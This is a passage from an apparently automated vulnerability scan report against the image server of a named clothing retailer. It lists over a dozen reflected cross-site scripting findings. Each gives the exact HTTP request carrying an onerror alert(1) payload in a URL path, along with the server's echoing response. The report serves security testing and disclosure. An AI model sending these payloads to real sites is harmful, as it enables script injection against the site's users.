Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:58 GMT
Connection: close

Unable to find /pacsun/topNavV3_hdrAccessories10Openb04b3<img src=a onerror=alert(1)>60a0eba2e53

3.119. http://images3.pacsun.com/is/image/pacsun/topNavV3_shopByCat10Open [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/topNavV3_shopByCat10Open

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 68016<img%20src%3da%20onerror%3dalert(1)>2ef5a5bf0eb was submitted in the REST URL parameter 4. This input was echoed as 68016<img src=a onerror=alert(1)>2ef5a5bf0eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/topNavV3_shopByCat10Open68016<img%20src%3da%20onerror%3dalert(1)>2ef5a5bf0eb?$img_gif-alpha$&$ext=.gif-alpha HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:55 GMT
Connection: close

Unable to find /pacsun/topNavV3_shopByCat10Open68016<img src=a onerror=alert(1)>2ef5a5bf0eb

3.120. http://images3.pacsun.com/is/image/pacsun/womensMega_092811 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/womensMega_092811

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d8e6<img%20src%3da%20onerror%3dalert(1)>23eed6dea83 was submitted in the REST URL parameter 4. This input was echoed as 9d8e6<img src=a onerror=alert(1)>23eed6dea83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/womensMega_0928119d8e6<img%20src%3da%20onerror%3dalert(1)>23eed6dea83?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:58 GMT
Connection: close

Unable to find /pacsun/womensMega_0928119d8e6<img src=a onerror=alert(1)>23eed6dea83

3.121. http://images3.pacsun.com/is/image/pacsunproducts/6108583M_01_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/6108583M_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6d4c3<img%20src%3da%20onerror%3dalert(1)>e79e5035c5e was submitted in the REST URL parameter 4. This input was echoed as 6d4c3<img src=a onerror=alert(1)>e79e5035c5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/6108583M_01_0016d4c3<img%20src%3da%20onerror%3dalert(1)>e79e5035c5e?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 90
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/6108583M_01_0016d4c3<img src=a onerror=alert(1)>e79e5035c5e

3.122. http://images3.pacsun.com/is/image/pacsunproducts/7601511_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7601511_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f70be<img%20src%3da%20onerror%3dalert(1)>e7af45d49d9 was submitted in the REST URL parameter 4. This input was echoed as f70be<img src=a onerror=alert(1)>e7af45d49d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/7601511_01f70be<img%20src%3da%20onerror%3dalert(1)>e7af45d49d9?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/7601511_01f70be<img src=a onerror=alert(1)>e7af45d49d9

3.123. http://images3.pacsun.com/is/image/pacsunproducts/7841695M_01_004 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7841695M_01_004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cffb6<img%20src%3da%20onerror%3dalert(1)>337232d97f9 was submitted in the REST URL parameter 4. This input was echoed as cffb6<img src=a onerror=alert(1)>337232d97f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/7841695M_01_004cffb6<img%20src%3da%20onerror%3dalert(1)>337232d97f9?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 90
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/7841695M_01_004cffb6<img src=a onerror=alert(1)>337232d97f9

3.124. http://images3.pacsun.com/is/image/pacsunproducts/7846660_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7846660_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95688<img%20src%3da%20onerror%3dalert(1)>9c4f9081633 was submitted in the REST URL parameter 4. This input was echoed as 95688<img src=a onerror=alert(1)>9c4f9081633 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/7846660_sw_00195688<img%20src%3da%20onerror%3dalert(1)>9c4f9081633?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/7846660_sw_00195688<img src=a onerror=alert(1)>9c4f9081633

3.125. http://images3.pacsun.com/is/image/pacsunproducts/7846660_sw_549 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7846660_sw_549

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 32fdf<img%20src%3da%20onerror%3dalert(1)>3a0ecae438c was submitted in the REST URL parameter 4. This input was echoed as 32fdf<img src=a onerror=alert(1)>3a0ecae438c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/7846660_sw_54932fdf<img%20src%3da%20onerror%3dalert(1)>3a0ecae438c?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/7846660_sw_54932fdf<img src=a onerror=alert(1)>3a0ecae438c

3.126. http://images3.pacsun.com/is/image/pacsunproducts/7914112_01_108 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7914112_01_108

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 96dcd<img%20src%3da%20onerror%3dalert(1)>49fb4dde708 was submitted in the REST URL parameter 4. This input was echoed as 96dcd<img src=a onerror=alert(1)>49fb4dde708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/7914112_01_10896dcd<img%20src%3da%20onerror%3dalert(1)>49fb4dde708?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/7914112_01_10896dcd<img src=a onerror=alert(1)>49fb4dde708

3.127. http://images3.pacsun.com/is/image/pacsunproducts/7954720M_01_010 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7954720M_01_010

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6707c<img%20src%3da%20onerror%3dalert(1)>38418db140 was submitted in the REST URL parameter 4. This input was echoed as 6707c<img src=a onerror=alert(1)>38418db140 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/7954720M_01_0106707c<img%20src%3da%20onerror%3dalert(1)>38418db140?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/7954720M_01_0106707c<img src=a onerror=alert(1)>38418db140

3.128. http://images3.pacsun.com/is/image/pacsunproducts/7982143_01_004 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7982143_01_004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e178<img%20src%3da%20onerror%3dalert(1)>49f933ea5e7 was submitted in the REST URL parameter 4. This input was echoed as 1e178<img src=a onerror=alert(1)>49f933ea5e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/7982143_01_0041e178<img%20src%3da%20onerror%3dalert(1)>49f933ea5e7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/7982143_01_0041e178<img src=a onerror=alert(1)>49f933ea5e7

3.129. http://images3.pacsun.com/is/image/pacsunproducts/8020984_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8020984_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2106e<img%20src%3da%20onerror%3dalert(1)>e3a1d7ad873 was submitted in the REST URL parameter 4. This input was echoed as 2106e<img src=a onerror=alert(1)>e3a1d7ad873 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8020984_012106e<img%20src%3da%20onerror%3dalert(1)>e3a1d7ad873?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/8020984_012106e<img src=a onerror=alert(1)>e3a1d7ad873

3.130. http://images3.pacsun.com/is/image/pacsunproducts/8078040_01_047 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8078040_01_047

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4ed90<img%20src%3da%20onerror%3dalert(1)>99806ff0896 was submitted in the REST URL parameter 4. This input was echoed as 4ed90<img src=a onerror=alert(1)>99806ff0896 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8078040_01_0474ed90<img%20src%3da%20onerror%3dalert(1)>99806ff0896?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8078040_01_0474ed90<img src=a onerror=alert(1)>99806ff0896

3.131. http://images3.pacsun.com/is/image/pacsunproducts/8160301_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8160301_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f58d7<img%20src%3da%20onerror%3dalert(1)>7d70f72ae03 was submitted in the REST URL parameter 4. This input was echoed as f58d7<img src=a onerror=alert(1)>7d70f72ae03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8160301_01f58d7<img%20src%3da%20onerror%3dalert(1)>7d70f72ae03?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
